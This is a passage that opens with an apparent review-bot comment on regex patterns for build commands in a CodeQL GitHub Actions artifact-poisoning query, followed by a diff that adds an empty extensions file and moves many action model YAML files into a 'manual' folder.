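Review bot: The `ant ` row lost the `^` anchor that the removed QL list had (`"^ant "`); with the `([^a-z]|^)` prefix the query prepends, `"ant "` now also matches mid-line after any non-letter character, e.g. inside a quoted message or a flag such as `--ant `, so I would restore it as `- ["^ant "]`. The local-script patterns capture everything after the interpreter, so `bash -e build.sh` yields `-e build.sh` as the command and the artifact-path prefix check in ArtifactPoisoningQuery will not match it; allowing optional flags, e.g. `(source|sh|bash|zsh|fish)\\s+(-\\S+\\s+)*(.*)` with the group index bumped to 4, would cover that common form. Since these rows are now the extension point, a comment at the top saying that command patterns are unanchored fragments while local-script patterns must match the whole line would prevent the two shapes being mixed up.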
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: repositoryDataModel
+ data: []
+ - addsTo:
+ pack: github/actions-all
+ extensible: workflowDataModel
+ data: []
diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/manual/8398a7_action-slack.model.yml
similarity index 100%
rename from ql/lib/ext/8398a7_action-slack.model.yml
rename to ql/lib/ext/manual/8398a7_action-slack.model.yml
diff --git a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml b/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml
similarity index 100%
rename from ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml
rename to ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml
diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/manual/actions_github-script.model.yml
similarity index 100%
rename from ql/lib/ext/actions_github-script.model.yml
rename to ql/lib/ext/manual/actions_github-script.model.yml
diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml
similarity index 100%
rename from ql/lib/ext/ahmadnassri_action-changed-files.model.yml
rename to ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml
diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml
similarity index 100%
rename from ql/lib/ext/akhileshns_heroku-deploy.model.yml
rename to ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml
diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml
similarity index 100%
rename from ql/lib/ext/amannn_action-semantic-pull-request.model.yml
rename to ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml
diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/manual/anchore_sbom-action.model.yml similarity index 100% rename from ql/lib/ext/anchore_sbom-action.model.yml rename to ql/lib/ext/manual/anchore_sbom-action.model.yml diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/manual/anchore_scan-action.model.yml similarity index 100% rename from ql/lib/ext/anchore_scan-action.model.yml rename to ql/lib/ext/manual/anchore_scan-action.model.yml diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/manual/andresz1_size-limit-action.model.yml similarity index 100% rename from ql/lib/ext/andresz1_size-limit-action.model.yml rename to ql/lib/ext/manual/andresz1_size-limit-action.model.yml diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/manual/android-actions_setup-android.model.yml similarity index 100% rename from ql/lib/ext/android-actions_setup-android.model.yml rename to ql/lib/ext/manual/android-actions_setup-android.model.yml diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml similarity index 100% rename from ql/lib/ext/apple-actions_import-codesign-certs.model.yml rename to ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/manual/asdf-vm_actions.model.yml similarity index 100% rename from ql/lib/ext/asdf-vm_actions.model.yml rename to ql/lib/ext/manual/asdf-vm_actions.model.yml diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml similarity index 100% rename from ql/lib/ext/ashley-taylor_read-json-property-action.model.yml rename to ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml 
diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml similarity index 100% rename from ql/lib/ext/ashley-taylor_regex-property-action.model.yml rename to ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/manual/aszc_change-string-case-action.model.yml similarity index 100% rename from ql/lib/ext/aszc_change-string-case-action.model.yml rename to ql/lib/ext/manual/aszc_change-string-case-action.model.yml diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml similarity index 100% rename from ql/lib/ext/aws-actions_configure-aws-credentials.model.yml rename to ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml similarity index 100% rename from ql/lib/ext/axel-op_googlejavaformat-action.model.yml rename to ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/manual/azure_powershell.model.yml similarity index 100% rename from ql/lib/ext/azure_powershell.model.yml rename to ql/lib/ext/manual/azure_powershell.model.yml diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/manual/bahmutov_npm-install.model.yml similarity index 100% rename from ql/lib/ext/bahmutov_npm-install.model.yml rename to ql/lib/ext/manual/bahmutov_npm-install.model.yml diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/manual/blackducksoftware_github-action.model.yml similarity index 100% rename from ql/lib/ext/blackducksoftware_github-action.model.yml rename to ql/lib/ext/manual/blackducksoftware_github-action.model.yml 
diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/manual/bobheadxi_deployments.model.yml similarity index 100% rename from ql/lib/ext/bobheadxi_deployments.model.yml rename to ql/lib/ext/manual/bobheadxi_deployments.model.yml diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml similarity index 100% rename from ql/lib/ext/bufbuild_buf-breaking-action.model.yml rename to ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml similarity index 100% rename from ql/lib/ext/bufbuild_buf-lint-action.model.yml rename to ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml similarity index 100% rename from ql/lib/ext/bufbuild_buf-setup-action.model.yml rename to ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/manual/cachix_cachix-action.model.yml similarity index 100% rename from ql/lib/ext/cachix_cachix-action.model.yml rename to ql/lib/ext/manual/cachix_cachix-action.model.yml diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/manual/changesets_action.model.yml similarity index 100% rename from ql/lib/ext/changesets_action.model.yml rename to ql/lib/ext/manual/changesets_action.model.yml diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml similarity index 100% rename from ql/lib/ext/cloudflare_wrangler-action.model.yml rename to ql/lib/ext/manual/cloudflare_wrangler-action.model.yml 
diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/manual/coursier_cache-action.model.yml similarity index 100% rename from ql/lib/ext/coursier_cache-action.model.yml rename to ql/lib/ext/manual/coursier_cache-action.model.yml diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml similarity index 100% rename from ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml rename to ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml similarity index 100% rename from ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml rename to ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/manual/csexton_release-asset-action.model.yml similarity index 100% rename from ql/lib/ext/csexton_release-asset-action.model.yml rename to ql/lib/ext/manual/csexton_release-asset-action.model.yml diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml similarity index 100% rename from ql/lib/ext/cycjimmy_semantic-release-action.model.yml rename to ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/manual/cypress-io_github-action.model.yml similarity index 100% rename from ql/lib/ext/cypress-io_github-action.model.yml rename to ql/lib/ext/manual/cypress-io_github-action.model.yml diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml similarity index 100% rename from ql/lib/ext/dailydotdev_action-devcard.model.yml rename to ql/lib/ext/manual/dailydotdev_action-devcard.model.yml 
diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml similarity index 100% rename from ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml rename to ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml similarity index 100% rename from ql/lib/ext/daspn_private-actions-checkout.model.yml rename to ql/lib/ext/manual/daspn_private-actions-checkout.model.yml diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml similarity index 100% rename from ql/lib/ext/dawidd6_action-ansible-playbook.model.yml rename to ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml similarity index 100% rename from ql/lib/ext/dawidd6_action-download-artifact.model.yml rename to ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml similarity index 100% rename from ql/lib/ext/delaguardo_setup-clojure.model.yml rename to ql/lib/ext/manual/delaguardo_setup-clojure.model.yml diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml similarity index 100% rename from ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml rename to ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml 
diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml similarity index 100% rename from ql/lib/ext/docker-practice_actions-setup-docker.model.yml rename to ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/manual/docker_build-push-action.model.yml similarity index 100% rename from ql/lib/ext/docker_build-push-action.model.yml rename to ql/lib/ext/manual/docker_build-push-action.model.yml diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/manual/endbug_latest-tag.model.yml similarity index 100% rename from ql/lib/ext/endbug_latest-tag.model.yml rename to ql/lib/ext/manual/endbug_latest-tag.model.yml diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/manual/expo_expo-github-action.model.yml similarity index 100% rename from ql/lib/ext/expo_expo-github-action.model.yml rename to ql/lib/ext/manual/expo_expo-github-action.model.yml diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml similarity index 100% rename from ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml rename to ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/manual/frabert_replace-string-action.model.yml similarity index 100% rename from ql/lib/ext/frabert_replace-string-action.model.yml rename to ql/lib/ext/manual/frabert_replace-string-action.model.yml diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml similarity index 100% rename from ql/lib/ext/franzdiebold_github-env-vars-action.model.yml rename to ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml 
diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml similarity index 100% rename from ql/lib/ext/gabrielbb_xvfb-action.model.yml rename to ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/manual/game-ci_unity-builder.model.yml similarity index 100% rename from ql/lib/ext/game-ci_unity-builder.model.yml rename to ql/lib/ext/manual/game-ci_unity-builder.model.yml diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml similarity index 100% rename from ql/lib/ext/game-ci_unity-test-runner.model.yml rename to ql/lib/ext/manual/game-ci_unity-test-runner.model.yml diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml similarity index 100% rename from ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml rename to ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/manual/getsentry_action-release.model.yml similarity index 100% rename from ql/lib/ext/getsentry_action-release.model.yml rename to ql/lib/ext/manual/getsentry_action-release.model.yml diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/manual/github_codeql-action.model.yml similarity index 100% rename from ql/lib/ext/github_codeql-action.model.yml rename to ql/lib/ext/manual/github_codeql-action.model.yml diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/manual/go-semantic-release_action.model.yml similarity index 100% rename from ql/lib/ext/go-semantic-release_action.model.yml rename to ql/lib/ext/manual/go-semantic-release_action.model.yml 
diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml similarity index 100% rename from ql/lib/ext/golangci_golangci-lint-action.model.yml rename to ql/lib/ext/manual/golangci_golangci-lint-action.model.yml diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml similarity index 100% rename from ql/lib/ext/gonuit_heroku-docker-deploy.model.yml rename to ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml similarity index 100% rename from ql/lib/ext/goreleaser_goreleaser-action.model.yml rename to ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml similarity index 100% rename from ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml rename to ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/manual/gradle_gradle-build-action.model.yml similarity index 100% rename from ql/lib/ext/gradle_gradle-build-action.model.yml rename to ql/lib/ext/manual/gradle_gradle-build-action.model.yml diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/manual/haya14busa_action-cond.model.yml similarity index 100% rename from ql/lib/ext/haya14busa_action-cond.model.yml rename to ql/lib/ext/manual/haya14busa_action-cond.model.yml diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/manual/hexlet_project-action.model.yml similarity index 100% rename from ql/lib/ext/hexlet_project-action.model.yml rename to ql/lib/ext/manual/hexlet_project-action.model.yml 
diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml similarity index 100% rename from ql/lib/ext/ilammy_msvc-dev-cmd.model.yml rename to ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/manual/ilammy_setup-nasm.model.yml similarity index 100% rename from ql/lib/ext/ilammy_setup-nasm.model.yml rename to ql/lib/ext/manual/ilammy_setup-nasm.model.yml diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml similarity index 100% rename from ql/lib/ext/imjohnbo_issue-bot.model.yml rename to ql/lib/ext/manual/imjohnbo_issue-bot.model.yml diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/manual/iterative_setup-cml.model.yml similarity index 100% rename from ql/lib/ext/iterative_setup-cml.model.yml rename to ql/lib/ext/manual/iterative_setup-cml.model.yml diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/manual/iterative_setup-dvc.model.yml similarity index 100% rename from ql/lib/ext/iterative_setup-dvc.model.yml rename to ql/lib/ext/manual/iterative_setup-dvc.model.yml diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml similarity index 100% rename from ql/lib/ext/jamesives_github-pages-deploy-action.model.yml rename to ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml similarity index 100% rename from ql/lib/ext/jitterbit_get-changed-files.model.yml rename to ql/lib/ext/manual/jitterbit_get-changed-files.model.yml 
diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml similarity index 100% rename from ql/lib/ext/johnnymorganz_stylua-action.model.yml rename to ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/manual/jsdaniell_create-json.model.yml similarity index 100% rename from ql/lib/ext/jsdaniell_create-json.model.yml rename to ql/lib/ext/manual/jsdaniell_create-json.model.yml diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/manual/jurplel_install-qt-action.model.yml similarity index 100% rename from ql/lib/ext/jurplel_install-qt-action.model.yml rename to ql/lib/ext/manual/jurplel_install-qt-action.model.yml diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml similarity index 100% rename from ql/lib/ext/jwalton_gh-ecr-push.model.yml rename to ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml similarity index 100% rename from ql/lib/ext/khan_pull-request-comment-trigger.model.yml rename to ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml similarity index 100% rename from ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml rename to ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml similarity index 100% rename from ql/lib/ext/leafo_gh-actions-lua.model.yml rename to ql/lib/ext/manual/leafo_gh-actions-lua.model.yml 
diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml similarity index 100% rename from ql/lib/ext/leafo_gh-actions-luarocks.model.yml rename to ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml similarity index 100% rename from ql/lib/ext/lucasbento_auto-close-issues.model.yml rename to ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml similarity index 100% rename from ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml rename to ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/manual/magefile_mage-action.model.yml similarity index 100% rename from ql/lib/ext/magefile_mage-action.model.yml rename to ql/lib/ext/manual/magefile_mage-action.model.yml diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/manual/maierj_fastlane-action.model.yml similarity index 100% rename from ql/lib/ext/maierj_fastlane-action.model.yml rename to ql/lib/ext/manual/maierj_fastlane-action.model.yml diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml similarity index 100% rename from ql/lib/ext/manusa_actions-setup-minikube.model.yml rename to ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/manual/marocchino_on_artifact.model.yml similarity index 100% rename from ql/lib/ext/marocchino_on_artifact.model.yml rename to ql/lib/ext/manual/marocchino_on_artifact.model.yml 
diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/manual/mattdavis0351_actions.model.yml similarity index 100% rename from ql/lib/ext/mattdavis0351_actions.model.yml rename to ql/lib/ext/manual/mattdavis0351_actions.model.yml diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml similarity index 100% rename from ql/lib/ext/meteorengineer_setup-meteor.model.yml rename to ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml similarity index 100% rename from ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml rename to ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml similarity index 100% rename from ql/lib/ext/microsoft_setup-msbuild.model.yml rename to ql/lib/ext/manual/microsoft_setup-msbuild.model.yml diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml similarity index 100% rename from ql/lib/ext/mishakav_pytest-coverage-comment.model.yml rename to ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml similarity index 100% rename from ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml rename to ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/manual/msys2_setup-msys2.model.yml similarity index 100% rename from ql/lib/ext/msys2_setup-msys2.model.yml rename to ql/lib/ext/manual/msys2_setup-msys2.model.yml 
diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml similarity index 100% rename from ql/lib/ext/mxschmitt_action-tmate.model.yml rename to ql/lib/ext/manual/mxschmitt_action-tmate.model.yml diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml similarity index 100% rename from ql/lib/ext/mymindstorm_setup-emsdk.model.yml rename to ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml similarity index 100% rename from ql/lib/ext/nanasess_setup-chromedriver.model.yml rename to ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/manual/nanasess_setup-php.model.yml similarity index 100% rename from ql/lib/ext/nanasess_setup-php.model.yml rename to ql/lib/ext/manual/nanasess_setup-php.model.yml diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/manual/nick-fields_retry.model.yml similarity index 100% rename from ql/lib/ext/nick-fields_retry.model.yml rename to ql/lib/ext/manual/nick-fields_retry.model.yml diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/manual/octokit_graphql-action.model.yml similarity index 100% rename from ql/lib/ext/octokit_graphql-action.model.yml rename to ql/lib/ext/manual/octokit_graphql-action.model.yml diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/manual/octokit_request-action.model.yml similarity index 100% rename from ql/lib/ext/octokit_request-action.model.yml rename to ql/lib/ext/manual/octokit_request-action.model.yml diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/manual/olafurpg_setup-scala.model.yml similarity index 100% rename from ql/lib/ext/olafurpg_setup-scala.model.yml rename to ql/lib/ext/manual/olafurpg_setup-scala.model.yml 
diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/manual/paambaati_codeclimate-action.model.yml similarity index 100% rename from ql/lib/ext/paambaati_codeclimate-action.model.yml rename to ql/lib/ext/manual/paambaati_codeclimate-action.model.yml diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/manual/peter-evans_create-pull-request.model.yml similarity index 100% rename from ql/lib/ext/peter-evans_create-pull-request.model.yml rename to ql/lib/ext/manual/peter-evans_create-pull-request.model.yml diff --git a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml b/ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml similarity index 100% rename from ql/lib/ext/peter-murray_issue-body-parser-action.model.yml rename to ql/lib/ext/manual/peter-murray_issue-body-parser-action.model.yml diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml similarity index 100% rename from ql/lib/ext/plasmicapp_plasmic-action.model.yml rename to ql/lib/ext/manual/plasmicapp_plasmic-action.model.yml diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/manual/preactjs_compressed-size-action.model.yml similarity index 100% rename from ql/lib/ext/preactjs_compressed-size-action.model.yml rename to ql/lib/ext/manual/preactjs_compressed-size-action.model.yml diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/manual/py-actions_flake8.model.yml similarity index 100% rename from ql/lib/ext/py-actions_flake8.model.yml rename to ql/lib/ext/manual/py-actions_flake8.model.yml diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/manual/py-actions_py-dependency-install.model.yml similarity index 100% rename from ql/lib/ext/py-actions_py-dependency-install.model.yml rename to ql/lib/ext/manual/py-actions_py-dependency-install.model.yml 
diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/manual/pyo3_maturin-action.model.yml similarity index 100% rename from ql/lib/ext/pyo3_maturin-action.model.yml rename to ql/lib/ext/manual/pyo3_maturin-action.model.yml diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml similarity index 100% rename from ql/lib/ext/reactivecircus_android-emulator-runner.model.yml rename to ql/lib/ext/manual/reactivecircus_android-emulator-runner.model.yml diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml similarity index 100% rename from ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml rename to ql/lib/ext/manual/redhat-plumbers-in-action_download-artifact.model.yml diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/manual/reggionick_s3-deploy.model.yml similarity index 100% rename from ql/lib/ext/reggionick_s3-deploy.model.yml rename to ql/lib/ext/manual/reggionick_s3-deploy.model.yml diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/manual/renovatebot_github-action.model.yml similarity index 100% rename from ql/lib/ext/renovatebot_github-action.model.yml rename to ql/lib/ext/manual/renovatebot_github-action.model.yml diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/manual/roots_issue-closer-action.model.yml similarity index 100% rename from ql/lib/ext/roots_issue-closer-action.model.yml rename to ql/lib/ext/manual/roots_issue-closer-action.model.yml diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/manual/ros-tooling_setup-ros.model.yml similarity index 100% rename from ql/lib/ext/ros-tooling_setup-ros.model.yml rename to ql/lib/ext/manual/ros-tooling_setup-ros.model.yml 
